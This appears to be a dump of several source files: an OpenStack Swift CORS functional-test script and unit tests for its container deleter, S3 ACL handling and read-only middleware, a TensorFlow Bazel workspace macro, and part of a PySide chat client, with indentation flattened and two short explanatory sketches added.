def __iter__(self):
while self.pos < self.size:
chunk = self.BUF[:self.size - self.pos]
self.pos += len(chunk)
yield chunk
def __len__(self):
return self.size
def setup(args):
conn = swiftclient.client.Connection(
ENV['OS_AUTH_URL'],
ENV['OS_USERNAME'],
ENV['OS_PASSWORD'],
timeout=30) # We've seen request times as high as 7-8s in the gate
cluster_info = conn.get_capabilities()
conn.put_container('private', {
'X-Container-Read': '',
'X-Container-Meta-Access-Control-Allow-Origin': '',
})
conn.put_container('referrer-allowed', {
'X-Container-Read': '.r:%s' % args.hostname,
'X-Container-Meta-Access-Control-Allow-Origin': (
'http://%s:%d' % (args.hostname, args.port)),
})
conn.put_container('other-referrer-allowed', {
'X-Container-Read': '.r:other-host',
'X-Container-Meta-Access-Control-Allow-Origin': 'http://other-host',
})
conn.put_container('public-with-cors', {
'X-Container-Read': '.r:*,.rlistings',
'X-Container-Meta-Access-Control-Allow-Origin': '*',
})
conn.put_container('private-with-cors', {
'X-Container-Read': '',
'X-Container-Meta-Access-Control-Allow-Origin': '*',
})
conn.put_container('public-no-cors', {
'X-Container-Read': '.r:*,.rlistings',
'X-Container-Meta-Access-Control-Allow-Origin': '',
})
conn.put_container('public-segments', {
'X-Container-Read': '.r:*',
'X-Container-Meta-Access-Control-Allow-Origin': '',
})
for container in ('private', 'referrer-allowed', 'other-referrer-allowed',
'public-with-cors', 'private-with-cors',
'public-no-cors'):
conn.put_object(container, 'obj', Zeroes(1024), headers={
'X-Object-Meta-Mtime': str(time.time())})
for n in range(10):
segment_etag = conn.put_object(
'public-segments', 'seg%02d' % n, Zeroes(1024 * 1024),
headers={'Content-Type': 'application/swiftclient-segment'})
conn.put_object(
'public-with-cors', 'dlo/seg%02d' % n, Zeroes(1024 * 1024),
headers={'Content-Type': 'application/swiftclient-segment'})
conn.put_object('public-with-cors', 'dlo-with-unlistable-segments', b'',
headers={'X-Object-Manifest': 'public-segments/seg'})
conn.put_object('public-with-cors', 'dlo', b'',
headers={'X-Object-Manifest': 'public-with-cors/dlo/seg'})
if 'slo' in cluster_info:
conn.put_object('public-with-cors', 'slo', json.dumps([
{'path': 'public-segments/seg%02d' % n, 'etag': segment_etag}
for n in range(10)]), query_string='multipart-manifest=put')
if 'symlink' in cluster_info:
for tgt in ('private', 'public-with-cors', 'public-no-cors'):
conn.put_object('public-with-cors', 'symlink-to-' + tgt, b'',
headers={'X-Symlink-Target': tgt + '/obj'})
def get_results_table(browser):
result_table = browser.find_element_by_id('results')
for row in result_table.find_elements_by_xpath('./tr'):
cells = row.find_elements_by_xpath('td')
yield (
cells[0].text,
browser.name + ': ' + cells[1].text,
cells[2].text)
def run(args, url):
results = []
browsers = list(ALL_BROWSERS) if 'all' in args.browsers else args.browsers
ran_one = False
for browser_name in browsers:
kwargs = {}
try:
options = getattr(
selenium.webdriver, browser_name.title() + 'Options')()
options.headless = True
kwargs['options'] = options
except AttributeError:
# not all browser types have Options class
pass
driver = getattr(selenium.webdriver, browser_name.title())
try:
browser = driver(**kwargs)
except Exception as e:
if not ('needs to be in PATH' in str(e) or
'SafariDriver was not found' in str(e)):
traceback.print_exc()
results.append(('SKIP', browser_name, str(e).strip()))
continue
ran_one = True
try:
browser.get(url)
start = time.time()
for _ in range(STEPS):
status = browser.find_element_by_id('status').text
if status.startswith('Complete'):
results.extend(get_results_table(browser))
break
time.sleep(TEST_TIMEOUT / STEPS)
else:
try:
results.extend(get_results_table(browser))
except Exception:
pass # worth a shot
# that took a sec; give it *one last chance* to succeed
status = browser.find_element_by_id('status').text
if not status.startswith('Complete'):
results.append((
'ERROR', browser_name, 'Timed out (%s)' % status))
continue
sys.stderr.write('Tested %s in %.1fs\n' % (
browser_name, time.time() - start))
except Exception as e:
results.append(('ERROR', browser_name, str(e).strip()))
finally:
browser.close()
if args.output is not None:
fp = open(args.output, 'w')
else:
fp = sys.stdout
fp.write('1..%d\n' % len(results))
rc = 0
if not ran_one:
rc += 1 # make sure "no tests ran" translates to "failed"
for test, (status, name, details) in enumerate(results, start=1):
if status == 'PASS':
fp.write('ok %d - %s\n' % (test, name))
elif status == 'SKIP':
fp.write('ok %d - %s # skip %s\n' % (test, name, details))
else:
fp.write('not ok %d - %s\n' % (test, name))
fp.write(' %s%s\n' % (status, ':' if details else ''))
if details:
fp.write(''.join(
' ' + line + '\n'
for line in details.split('\n')))
rc += 1
if fp is not sys.stdout:
fp.close()
return rc
ALL_BROWSERS = [
'firefox',
'chrome',
'safari',
'edge',
'ie',
]
if __name__ == '__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='Set up and run CORS functional tests',
epilog='''The tests consist of three parts:
setup - Create several test containers with well-known names, set appropriate
ACLs and CORS metadata, and upload some test objects.
serve - Serve a static website on localhost which, on load, will make several
CORS requests and verify expected behavior.
run - Use Selenium to load the website, wait for and scrape the results,
and output them in TAP format.
By default, perform all three parts. You can skip some or all of the parts
with the --no-setup, --no-serve, and --no-run options.
''')
parser.add_argument('-P', '--port', type=int, default=8000)
parser.add_argument('-H', '--hostname', default='localhost')
parser.add_argument('--no-setup', action='store_true')
parser.add_argument('--no-serve', action='store_true')
parser.add_argument('--no-run', action='store_true')
parser.add_argument('-o', '--output')
parser.add_argument('browsers', nargs='*',
default='all',
choices=['all'] + ALL_BROWSERS)
args = parser.parse_args()
if not args.no_setup:
setup(args)
if args.no_serve:
site = None
else:
site = CORSSite(args.port)
should_run = not args.no_run
if should_run and not selenium:
print('Selenium not available; cannot run tests automatically')
should_run = False
if ENV['OS_STORAGE_URL'] is None:
ENV['OS_STORAGE_URL'] = swiftclient.client.get_auth(
ENV['OS_AUTH_URL'],
ENV['OS_USERNAME'],
ENV['OS_PASSWORD'],
timeout=1)[0]
url = 'http://%s:%d/#%s' % (args.hostname, args.port, '&'.join(
'%s=%s' % (urllib.parse.quote(key), urllib.parse.quote(val))
for key, val in ENV.items()))
rc = 0
if should_run:
if site:
site.start()
try:
rc = run(args, url)
finally:
if site:
site.terminate()
else:
if site:
print('Serving test at %s' % url)
try:
site.run()
except KeyboardInterrupt:
pass
exit(rc)
```
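One detail of the script above worth isolating is `Zeroes`: it streams an arbitrary number of zero bytes in 64 KiB chunks without materializing them, while still reporting a `len()` so swiftclient can set Content-Length. A self-contained sketch (stream-once by design, since `pos` is never reset):
```python
# Standalone copy of the Zeroes idea: a sized, stream-once zero body.
class Zeroes(object):
    BUF = b'\x00' * 64 * 1024

    def __init__(self, size=0):
        self.pos = 0
        self.size = size

    def __iter__(self):
        while self.pos < self.size:
            # Slicing BUF caps the final chunk at the bytes still owed.
            chunk = self.BUF[:self.size - self.pos]
            self.pos += len(chunk)
            yield chunk

    def __len__(self):
        return self.size

body = Zeroes(3 * 64 * 1024 + 5)
print(len(body))                  # 196613
print(sum(len(c) for c in body))  # 196613, in at most 64 KiB chunks
```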
#### File: unit/cli/test_container_deleter.py
```python
import collections
import itertools
import json
import mock
import six
import unittest
from swift.cli import container_deleter
from swift.common import internal_client
from swift.common import swob
from swift.common import utils
AppCall = collections.namedtuple('AppCall', [
'method', 'path', 'query', 'headers', 'body'])
class FakeInternalClient(internal_client.InternalClient):
def __init__(self, responses):
self.resp_iter = iter(responses)
self.calls = []
def make_request(self, method, path, headers, acceptable_statuses,
body_file=None, params=None):
if body_file is None:
body = None
else:
body = body_file.read()
path, _, query = path.partition('?')
self.calls.append(AppCall(method, path, query, headers, body))
resp = next(self.resp_iter)
if isinstance(resp, Exception):
raise resp
return resp
def __enter__(self):
return self
def __exit__(self, *args):
unused_responses = [r for r in self.resp_iter]
if unused_responses:
raise Exception('Unused responses: %r' % unused_responses)
class TestContainerDeleter(unittest.TestCase):
def setUp(self):
patcher = mock.patch.object(container_deleter.time, 'time',
side_effect=itertools.count())
patcher.__enter__()
self.addCleanup(patcher.__exit__, None, None, None)
patcher = mock.patch.object(container_deleter, 'OBJECTS_PER_UPDATE', 5)
patcher.__enter__()
self.addCleanup(patcher.__exit__, None, None, None)
def test_make_delete_jobs(self):
ts = '1558463777.42739'
self.assertEqual(
container_deleter.make_delete_jobs(
'acct', 'cont', ['obj1', 'obj2'],
utils.Timestamp(ts)),
[{'name': ts + '-acct/cont/obj1',
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'},
{'name': ts + '-acct/cont/obj2',
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'}])
def test_make_delete_jobs_native_utf8(self):
ts = '1558463777.42739'
uacct = acct = u'acct-\U0001f334'
ucont = cont = u'cont-\N{SNOWMAN}'
uobj1 = obj1 = u'obj-\N{GREEK CAPITAL LETTER ALPHA}'
uobj2 = obj2 = u'/obj-\N{GREEK CAPITAL LETTER OMEGA}'
if six.PY2:
acct = acct.encode('utf8')
cont = cont.encode('utf8')
obj1 = obj1.encode('utf8')
obj2 = obj2.encode('utf8')
self.assertEqual(
container_deleter.make_delete_jobs(
acct, cont, [obj1, obj2], utils.Timestamp(ts)),
[{'name': u'%s-%s/%s/%s' % (ts, uacct, ucont, uobj1),
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'},
{'name': u'%s-%s/%s/%s' % (ts, uacct, ucont, uobj2),
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'}])
def test_make_delete_jobs_unicode_utf8(self):
ts = '1558463777.42739'
acct = u'acct-\U0001f334'
cont = u'cont-\N{SNOWMAN}'
obj1 = u'obj-\N{GREEK CAPITAL LETTER ALPHA}'
obj2 = u'obj-\N{GREEK CAPITAL LETTER OMEGA}'
self.assertEqual(
container_deleter.make_delete_jobs(
acct, cont, [obj1, obj2], utils.Timestamp(ts)),
[{'name': u'%s-%s/%s/%s' % (ts, acct, cont, obj1),
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'},
{'name': u'%s-%s/%s/%s' % (ts, acct, cont, obj2),
'deleted': 0,
'created_at': ts,
'etag': utils.MD5_OF_EMPTY_STRING,
'size': 0,
'storage_policy_index': 0,
'content_type': 'application/async-deleted'}])
def test_mark_for_deletion_empty_no_yield(self):
with FakeInternalClient([
swob.Response(json.dumps([
])),
]) as swift:
self.assertEqual(container_deleter.mark_for_deletion(
swift,
'account',
'container',
'marker',
'end',
'prefix',
timestamp=None,
yield_time=None,
), 0)
self.assertEqual(swift.calls, [
('GET', '/v1/account/container',
'format=json&marker=marker&end_marker=end&prefix=prefix',
{}, None),
])
def test_mark_for_deletion_empty_with_yield(self):
with FakeInternalClient([
swob.Response(json.dumps([
])),
]) as swift:
self.assertEqual(list(container_deleter.mark_for_deletion(
swift,
'account',
'container',
'marker',
'end',
'prefix',
timestamp=None,
yield_time=0.5,
)), [(0, None)])
self.assertEqual(swift.calls, [
('GET', '/v1/account/container',
'format=json&marker=marker&end_marker=end&prefix=prefix',
{}, None),
])
def test_mark_for_deletion_one_update_no_yield(self):
ts = '1558463777.42739'
with FakeInternalClient([
swob.Response(json.dumps([
{'name': '/obj1'},
{'name': 'obj2'},
{'name': 'obj3'},
])),
swob.Response(json.dumps([
])),
swob.Response(status=202),
]) as swift:
self.assertEqual(container_deleter.mark_for_deletion(
swift,
'account',
'container',
'',
'',
'',
timestamp=utils.Timestamp(ts),
yield_time=None,
), 3)
self.assertEqual(swift.calls, [
('GET', '/v1/account/container',
'format=json&marker=&end_marker=&prefix=', {}, None),
('GET', '/v1/account/container',
'format=json&marker=obj3&end_marker=&prefix=', {}, None),
('UPDATE', '/v1/.expiring_objects/' + ts.split('.')[0], '', {
'X-Backend-Allow-Private-Methods': 'True',
'X-Backend-Storage-Policy-Index': '0',
'X-Timestamp': ts}, mock.ANY),
])
self.assertEqual(
json.loads(swift.calls[-1].body),
container_deleter.make_delete_jobs(
'account', 'container', ['/obj1', 'obj2', 'obj3'],
utils.Timestamp(ts)
)
)
def test_mark_for_deletion_two_updates_with_yield(self):
ts = '1558463777.42739'
with FakeInternalClient([
swob.Response(json.dumps([
{'name': 'obj1'},
{'name': 'obj2'},
{'name': 'obj3'},
{'name': u'obj4-\N{SNOWMAN}'},
{'name': 'obj5'},
{'name': 'obj6'},
])),
swob.Response(status=202),
swob.Response(json.dumps([
])),
swob.Response(status=202),
]) as swift:
self.assertEqual(list(container_deleter.mark_for_deletion(
swift,
'account',
'container',
'',
'end',
'pre',
timestamp=utils.Timestamp(ts),
yield_time=0,
)), [(5, 'obj5'), (6, 'obj6'), (6, None)])
self.assertEqual(swift.calls, [
('GET', '/v1/account/container',
'format=json&marker=&end_marker=end&prefix=pre', {}, None),
('UPDATE', '/v1/.expiring_objects/' + ts.split('.')[0], '', {
'X-Backend-Allow-Private-Methods': 'True',
'X-Backend-Storage-Policy-Index': '0',
'X-Timestamp': ts}, mock.ANY),
('GET', '/v1/account/container',
'format=json&marker=obj6&end_marker=end&prefix=pre',
{}, None),
('UPDATE', '/v1/.expiring_objects/' + ts.split('.')[0], '', {
'X-Backend-Allow-Private-Methods': 'True',
'X-Backend-Storage-Policy-Index': '0',
'X-Timestamp': ts}, mock.ANY),
])
self.assertEqual(
json.loads(swift.calls[-3].body),
container_deleter.make_delete_jobs(
'account', 'container',
['obj1', 'obj2', 'obj3', u'obj4-\N{SNOWMAN}', 'obj5'],
utils.Timestamp(ts)
)
)
self.assertEqual(
json.loads(swift.calls[-1].body),
container_deleter.make_delete_jobs(
'account', 'container', ['obj6'],
utils.Timestamp(ts)
)
)
def test_init_internal_client_log_name(self):
with mock.patch(
'swift.cli.container_deleter.InternalClient') \
as mock_ic:
container_deleter.main(['a', 'c', '--request-tries', '2'])
mock_ic.assert_called_once_with(
'/etc/swift/internal-client.conf',
'Swift Container Deleter', 2,
global_conf={'log_name': 'container-deleter-ic'})
```
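The assertions above pin down the queue-entry naming scheme `make_delete_jobs` uses: `<timestamp>-<account>/<container>/<object>`, filed under an `.expiring_objects` container named after the integer part of the timestamp. For illustration, a hypothetical inverse of that scheme (`parse_job_name` is my own helper name, not something `swift.cli.container_deleter` exports):
```python
# Illustrative inverse of make_delete_jobs' job naming.
def parse_job_name(name):
    # The timestamp never contains '-', so split at the first one.
    ts, _, path = name.partition('-')
    # Object names may contain '/', so split at most twice.
    account, container, obj = path.split('/', 2)
    return ts, account, container, obj

print(parse_job_name('1558463777.42739-acct/cont/obj1'))
# ('1558463777.42739', 'acct', 'cont', 'obj1')
```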
#### File: middleware/s3api/test_acl_utils.py
```python
import unittest
from swift.common.swob import Request
from swift.common.middleware.s3api import s3response
from swift.common.middleware.s3api.acl_utils import handle_acl_header
from test.unit.common.middleware.s3api import S3ApiTestCase
class TestS3ApiAclUtils(S3ApiTestCase):
def setUp(self):
super(TestS3ApiAclUtils, self).setUp()
def check_generated_acl_header(self, acl, expected):
req = Request.blank('/bucket',
headers={'X-Amz-Acl': acl})
try:
handle_acl_header(req)
except s3response.ErrorResponse as e:
if isinstance(e, expected):
self.assertEqual(expected._status, e._status)
else:
raise
else:
for target in expected:
self.assertTrue(target[0] in req.headers)
self.assertEqual(req.headers[target[0]], target[1])
def test_canned_acl_header(self):
# https://docs.aws.amazon.com/AmazonS3/latest/userguide/acl-overview.html#canned-acl
self.check_generated_acl_header(
'private',
[('X-Container-Read', '.'), ('X-Container-Write', '.')])
self.check_generated_acl_header(
'public-read', [('X-Container-Read', '.r:*,.rlistings')])
self.check_generated_acl_header(
'public-read-write', [('X-Container-Read', '.r:*,.rlistings'),
('X-Container-Write', '.r:*')])
self.check_generated_acl_header(
'aws-exec-read', s3response.InvalidArgument)
self.check_generated_acl_header(
'authenticated-read', s3response.S3NotImplemented)
self.check_generated_acl_header(
'bucket-owner-read', [('X-Container-Read', '.'),
('X-Container-Write', '.')])
self.check_generated_acl_header(
'bucket-owner-full-control', [('X-Container-Read', '.'),
('X-Container-Write', '.')])
self.check_generated_acl_header(
'log-delivery-write', s3response.S3NotImplemented)
# the 400 response is the catch all
self.check_generated_acl_header(
'some-non-sense', s3response.InvalidArgument)
if __name__ == '__main__':
unittest.main()
```
#### File: common/middleware/test_read_only.py
```python
import mock
import unittest
from swift.common.middleware import read_only
from swift.common.swob import Request
from test.debug_logger import debug_logger
class FakeApp(object):
def __call__(self, env, start_response):
start_response('200 OK', [])
return [b'Some Content']
def start_response(*args):
pass
read_methods = 'GET HEAD'.split()
write_methods = 'COPY DELETE POST PUT'.split()
ro_resp = [b'Writes are disabled for this account.']
class TestReadOnly(unittest.TestCase):
def test_global_read_only_off(self):
conf = {
'read_only': 'false',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={}):
for method in read_methods + write_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_on(self):
conf = {
'read_only': 'true',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={}):
for method in read_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
for method in write_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(ro_resp, resp)
def test_account_read_only_on(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={'sysmeta': {'read-only': 'true'}}):
for method in read_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
for method in write_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(ro_resp, resp)
def test_account_read_only_off(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={'sysmeta': {'read-only': 'false'}}):
for method in read_methods + write_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_on_account_off(self):
conf = {
'read_only': 'true',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={'sysmeta': {'read-only': 'false'}}):
for method in read_methods + write_methods:
req = Request.blank('/v1/a')
req.method = method
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_on_allow_deletes(self):
conf = {
'read_only': 'true',
'allow_deletes': 'true',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={}):
req = Request.blank('/v1/a')
req.method = "DELETE"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_account_read_only_on_allow_deletes(self):
conf = {
'allow_deletes': 'true',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch('swift.common.middleware.read_only.get_info',
return_value={'sysmeta': {'read-only': 'on'}}):
req = Request.blank('/v1/a')
req.method = "DELETE"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_on_destination_account_off_on_copy(self):
conf = {
'read_only': 'true',
}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
def get_fake_read_only(*args, **kwargs):
if 'b' in args:
return {'sysmeta': {'read-only': 'false'}}
return {}
with mock.patch('swift.common.middleware.read_only.get_info',
get_fake_read_only):
headers = {'Destination-Account': 'b'}
req = Request.blank('/v1/a', headers=headers)
req.method = "COPY"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_off_destination_account_on_on_copy(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
def get_fake_read_only(*args, **kwargs):
if 'b' in args:
return {'sysmeta': {'read-only': 'true'}}
return {}
with mock.patch('swift.common.middleware.read_only.get_info',
get_fake_read_only):
headers = {'Destination-Account': 'b'}
req = Request.blank('/v1/a', headers=headers)
req.method = "COPY"
resp = ro(req.environ, start_response)
self.assertEqual(ro_resp, resp)
def test_global_read_only_off_src_acct_on_dest_acct_off_on_copy(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
def fake_account_read_only(self, req, account):
if account == 'a':
return 'on'
return ''
with mock.patch(
'swift.common.middleware.read_only.ReadOnlyMiddleware.' +
'account_read_only',
fake_account_read_only):
headers = {'Destination-Account': 'b'}
req = Request.blank('/v1/a', headers=headers)
req.method = "COPY"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
def test_global_read_only_off_src_acct_on_dest_acct_on_on_copy(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
with mock.patch(
'swift.common.middleware.read_only.ReadOnlyMiddleware.' +
'account_read_only',
return_value='true'):
headers = {'Destination-Account': 'b'}
req = Request.blank('/v1/a', headers=headers)
req.method = "COPY"
resp = ro(req.environ, start_response)
self.assertEqual(ro_resp, resp)
def test_global_read_only_non_swift_path(self):
conf = {}
ro = read_only.filter_factory(conf)(FakeApp())
ro.logger = debug_logger()
def fake_account_read_only(self, req, account):
return 'on'
with mock.patch(
'swift.common.middleware.read_only.ReadOnlyMiddleware.' +
'account_read_only',
fake_account_read_only):
req = Request.blank('/auth/v3.14')
req.method = "POST"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
req = Request.blank('/v1')
req.method = "PUT"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
req = Request.blank('/v1.0/')
req.method = "DELETE"
resp = ro(req.environ, start_response)
self.assertEqual(resp, [b'Some Content'])
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "10088/tensorflow",
"score": 2
} |
#### File: tensorflow/tensorflow/workspace1.bzl
```python
load("//third_party/android:android_configure.bzl", "android_configure")
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
load("@com_github_grpc_grpc//bazel:grpc_deps.bzl", "grpc_deps")
load("@io_bazel_rules_closure//closure:defs.bzl", "closure_repositories")
load("@rules_cuda//cuda:dependencies.bzl", "rules_cuda_dependencies")
def workspace():
native.register_toolchains("@local_config_python//:py_toolchain")
rules_cuda_dependencies()
closure_repositories()
http_archive(
name = "bazel_toolchains",
sha256 = "540cc8fec2bf8ab64d16fb9a7018f25738a4a03434057ea01b5d34add446ffb1",
strip_prefix = "bazel-toolchains-ea243d43269df23de03a797cff2347e1fc3d02bb",
urls = [
"http://mirror.tensorflow.org/github.com/bazelbuild/bazel-toolchains/archive/ea243d43269df23de03a797cff2347e1fc3d02bb.tar.gz",
"https://github.com/bazelbuild/bazel-toolchains/archive/ea243d43269df23de03a797cff2347e1fc3d02bb.tar.gz",
],
)
android_configure(name = "local_config_android")
grpc_deps()
# Alias so it can be loaded without assigning to a different symbol to prevent
# shadowing previous loads and trigger a buildifier warning.
tf_workspace1 = workspace
``` |
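As context for how this macro is consumed: a `.bzl` file like this is loaded from the repository's `WORKSPACE`. A sketch of the expected call site in Starlark (the load label is an assumption based on the `tf_workspace1` alias defined above):
```python
# Hypothetical WORKSPACE fragment; assumes this file is
# //tensorflow:workspace1.bzl in the consuming repository.
load("//tensorflow:workspace1.bzl", "tf_workspace1")

tf_workspace1()
```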
{
"source": "100dlswjd/message_2",
"score": 2
} |
#### File: message_2/client/client_form.py
```python
from PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale,
QMetaObject, QObject, QPoint, QRect,
QSize, QTime, QUrl, Qt)
from PySide6.QtGui import (QAction, QBrush, QColor, QConicalGradient,
QCursor, QFont, QFontDatabase, QGradient,
QIcon, QImage, QKeySequence, QLinearGradient,
QPainter, QPalette, QPixmap, QRadialGradient,
QTransform)
from PySide6.QtWidgets import (QApplication, QHBoxLayout, QLabel, QLineEdit,
QListWidget, QListWidgetItem, QMainWindow, QMenu,
QMenuBar, QPushButton, QSizePolicy, QStatusBar,
QVBoxLayout, QWidget)
class Ui_mainWindow(object):
def setupUi(self, mainWindow):
if not mainWindow.objectName():
mainWindow.setObjectName(u"mainWindow")
mainWindow.resize(268, 527)
mainWindow.setInputMethodHints(Qt.ImhMultiLine)
self.actionserver_ip = QAction(mainWindow)
self.actionserver_ip.setObjectName(u"actionserver_ip")
self.action_name_set = QAction(mainWindow)
self.action_name_set.setObjectName(u"action_name_set")
self.centralwidget = QWidget(mainWindow)
self.centralwidget.setObjectName(u"centralwidget")
self.verticalLayout = QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName(u"verticalLayout")
self.label = QLabel(self.centralwidget)
self.label.setObjectName(u"label")
self.label.setAlignment(Qt.AlignCenter)
self.verticalLayout.addWidget(self.label)
self.horizontalLayout_2 = QHBoxLayout()
self.horizontalLayout_2.setObjectName(u"horizontalLayout_2")
self.lineEdit_ip_set = QLineEdit(self.centralwidget)
self.lineEdit_ip_set.setObjectName(u"lineEdit_ip_set")
self.horizontalLayout_2.addWidget(self.lineEdit_ip_set)
self.btn_ip_set = QPushButton(self.centralwidget)
self.btn_ip_set.setObjectName(u"btn_ip_set")
self.horizontalLayout_2.addWidget(self.btn_ip_set)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.listWidget = QListWidget(self.centralwidget)
self.listWidget.setObjectName(u"listWidget")
self.listWidget.setInputMethodHints(Qt.ImhMultiLine)
self.listWidget.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.verticalLayout.addWidget(self.listWidget)
self.horizontalLayout = QHBoxLayout()
self.horizontalLayout.setObjectName(u"horizontalLayout")
self.lineEdit_message = QLineEdit(self.centralwidget)
self.lineEdit_message.setObjectName(u"lineEdit_message")
self.horizontalLayout.addWidget(self.lineEdit_message)
self.btn_message = QPushButton(self.centralwidget)
self.btn_message.setObjectName(u"btn_message")
self.horizontalLayout.addWidget(self.btn_message)
self.verticalLayout.addLayout(self.horizontalLayout)
mainWindow.setCentralWidget(self.centralwidget)
self.menubar = QMenuBar(mainWindow)
self.menubar.setObjectName(u"menubar")
self.menubar.setGeometry(QRect(0, 0, 268, 22))
self.menu = QMenu(self.menubar)
self.menu.setObjectName(u"menu")
mainWindow.setMenuBar(self.menubar)
self.statusbar = QStatusBar(mainWindow)
self.statusbar.setObjectName(u"statusbar")
mainWindow.setStatusBar(self.statusbar)
self.menubar.addAction(self.menu.menuAction())
self.menu.addAction(self.action_name_set)
self.retranslateUi(mainWindow)
QMetaObject.connectSlotsByName(mainWindow)
# setupUi
def retranslateUi(self, mainWindow):
mainWindow.setWindowTitle(QCoreApplication.translate("mainWindow", u"ddatG-Client", None))
self.actionserver_ip.setText(QCoreApplication.translate("mainWindow", u"server - ip", None))
self.action_name_set.setText(QCoreApplication.translate("mainWindow", u"\ub2c9\ub124\uc784 \uc124\uc815", None))
self.label.setText(QCoreApplication.translate("mainWindow", u"\ud604\uc7ac \uc11c\ubc84 : ", None))
self.btn_ip_set.setText(QCoreApplication.translate("mainWindow", u"\uc811\uc18d", None))
self.btn_message.setText(QCoreApplication.translate("mainWindow", u"\uc804\uc1a1", None))
self.menu.setTitle(QCoreApplication.translate("mainWindow", u"\uc124\uc815", None))
# retranslateUi
```
#### File: message_2/client/main.py
```python
import sys
import win32gui
import socket
import time
from qt_material import apply_stylesheet
from PySide6.QtCore import Slot, QObject, Signal, QEvent
from PySide6.QtWidgets import QMainWindow, QApplication, QListWidgetItem, QDialog, QWidget
from PySide6.QtNetwork import QTcpSocket
from PySide6.QtGui import Qt, QKeyEvent, QCloseEvent
from client_form import Ui_mainWindow
from name_set import Ui_Form
def pressed(widget : QWidget):
class Filter(QObject):
pressed = Signal(QKeyEvent)
def eventFilter(self, watched: QObject, event: QEvent) -> bool:
if watched == widget and event.type() == QEvent.KeyPress:
self.pressed.emit(QKeyEvent(event))
return super().eventFilter(watched, event)
    key_filter = Filter(widget)
    widget.installEventFilter(key_filter)
    return key_filter.pressed
class name_set(QDialog, Ui_Form):
def __init__(self):
super(name_set, self).__init__()
self.setupUi(self)
self.flag = False
self.btn_ok.clicked.connect(self.click_handler)
self.exec()
def result(self):
return self.flag, self.lineEdit.text()
@Slot()
def click_handler(self):
self.flag = True
self.close()
class Mainwindow(QMainWindow, Ui_mainWindow):
def __init__(self):
super(Mainwindow, self).__init__()
self.setupUi(self)
self.bind_flag = False
self._ip = ""
self.name = "알수없음"
self.client_ip = socket.gethostbyname(socket.gethostname())
self.action_name_set.triggered.connect(self.triggered_handler)
self._sock = QTcpSocket()
self._sock.readyRead.connect(self.readyRead_handler)
self._sock.connected.connect(self.connect_handler)
self._sock.errorOccurred.connect(self.error_handler)
self._sock.disconnected.connect(self.disconnect_handler)
self.btn_ip_set.clicked.connect(self.btn_ip_handler)
self.btn_message.clicked.connect(self.btn_message_handler)
pressed(self.lineEdit_message).connect(self.message_press_handler)
pressed(self.lineEdit_ip_set).connect(self.ip_set_press_handler)
@Slot(QKeyEvent)
def ip_set_press_handler(self, Key_Event : QKeyEvent):
if Key_Event.key() == Qt.Key_Return:
self.btn_ip_set.click()
@Slot(QKeyEvent)
def message_press_handler(self, Key_Event : QKeyEvent):
if Key_Event.key() == Qt.Key_Return:
self.btn_message.click()
@Slot()
def triggered_handler(self):
        flag, name = name_set().result()
if flag:
            before_name = self.name
if len(name) > 10:
name = name[:10]
